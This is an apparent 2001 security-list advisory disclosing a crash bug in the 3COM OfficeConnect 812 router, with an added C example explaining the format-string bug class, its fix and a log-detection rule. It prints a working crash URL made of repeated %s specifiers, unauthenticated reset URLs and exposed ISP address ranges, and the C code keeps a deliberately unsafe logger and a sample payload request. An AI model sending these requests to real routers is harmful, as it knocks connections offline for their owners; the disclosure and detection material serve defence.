Yesterday night I discovered a vulnerability. The router is a 3COM OfficeConnect 812 and the vulnerability is in the HTTP server, on port 80.

When you enter with a browser on one of these routers, you are asked for a user/password. If you fail, you see a web page telling you that it is a protected object, but there is a .GIF file you have access to, and you don't need to put the .GIF extension:

http://192.168.1.254/graphics/sml3com

Well... you put this, and you see the image... well.... let's add a long string after it.

Exploit:
--------
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s

...the router causes an NMI, red lights, flashing lights... and it's dead; it disconnects and comes back online in a minute.

The 3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts on almost all DSL connections, even for all sorts of business. They are selling this router now even though there is a better firmware (not tested yet) that maybe resolves this problem.

Solution: put filters on the router for the remote sites and only allow connections to ports 23 and 80 from the local network. If you're Spanish, take care because your IP is fixed and you have a very "clear" domain: 195.255.*.* and 217.97.*.*

Not Copyrighted by UnMateria - May 2001 :-)

ANNEX:
http://192.168.1.254/adsl_pair_select
http://192.168.1.254/adsl_reset

Very insecure for strangers ;-)... the server here doesn't ask for a password, so you can reset the router from the web interface itself (and without credentials).
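The crash pattern above (a run of %s in the request path) is what a format-string bug in the web server's request handling looks like from the outside. The following C is an added example, not code from the original post and not 3COM's firmware: it models the bug class with a request logger that passes the URL path as the printf format string, shows the one-line fix (path as an argument, "%s" as the format), and adds a triage rule that counts conversion specifiers in a request path so such requests can be spotted in access logs. All function names and the sample request lines are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>

static char logbuf[256];

/* BUG CLASS: attacker-controlled text used as the format string. Each %s makes
 * snprintf fetch a pointer that was never passed and dereference it, which on a
 * router with no memory protection ends in an exception (the NMI in the post).
 * Calling this with a path containing '%' directives is undefined behaviour;
 * it is kept here only for side-by-side comparison. */
const char *log_request_unsafe(const char *path) {
    snprintf(logbuf, sizeof logbuf, path);        /* path IS the format */
    return logbuf;
}

/* FIX: the format is a literal and the path is an ordinary argument, so any
 * '%' in the path is copied verbatim instead of being interpreted. */
const char *log_request_safe(const char *path) {
    snprintf(logbuf, sizeof logbuf, "%s", path);  /* path is an argument */
    return logbuf;
}

/* Count printf conversion specifiers in a string. "%%" is an escaped literal
 * percent and is not counted. Note that percent-encoded URL characters such
 * as "%25" also start with '%', so a single hit is not proof of an attack;
 * use a threshold when triaging logs. */
int count_format_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%" -> literal percent, skip both */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Number of request lines ("METHOD PATH VERSION") whose PATH carries at least
 * `threshold` conversion specifiers. Lines without a path token are skipped. */
int count_suspicious_requests(const char *const lines[], int nlines, int threshold) {
    int flagged = 0;
    for (int i = 0; i < nlines; i++) {
        const char *sp = strchr(lines[i], ' ');
        if (!sp)
            continue;
        const char *path = sp + 1;
        const char *end = strchr(path, ' ');
        size_t len = end ? (size_t)(end - path) : strlen(path);
        char tmp[512];
        if (len >= sizeof tmp)
            len = sizeof tmp - 1;
        memcpy(tmp, path, len);
        tmp[len] = '\0';
        if (count_format_directives(tmp) >= threshold)
            flagged++;
    }
    return flagged;
}

/* Constructed sample request lines (not real captured traffic). */
static const char *const SAMPLE_REQUESTS[] = {
    "GET /graphics/sml3com HTTP/1.0",
    "GET /graphics/sml3com%s%s%s%s%s%s%s%s HTTP/1.0",
    "GET /adsl_reset HTTP/1.0",
    "GET /search?q=100%25 HTTP/1.0",
};
#define SAMPLE_COUNT ((int)(sizeof SAMPLE_REQUESTS / sizeof SAMPLE_REQUESTS[0]))

int main(void) {
    /* The safe logger copies the directives literally instead of expanding them. */
    printf("safe log: %s\n", log_request_safe("/graphics/sml3com%s%s"));
    printf("requests with >= 3 directives: %d\n",
           count_suspicious_requests(SAMPLE_REQUESTS, SAMPLE_COUNT, 3));
    printf("requests with >= 1 directive:  %d\n",
           count_suspicious_requests(SAMPLE_REQUESTS, SAMPLE_COUNT, 1));
    return 0;
}
```

The threshold matters: a single '%' is common in legitimate URLs because of percent-encoding ("%25", "%20"), so a rule that alerts on one directive will be noisy, while a run of several %s or any %n in a path has no legitimate reason to be there.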
This archive was generated by hypermail 2b30 : Tue May 15 2001 - 12:03:08 PDT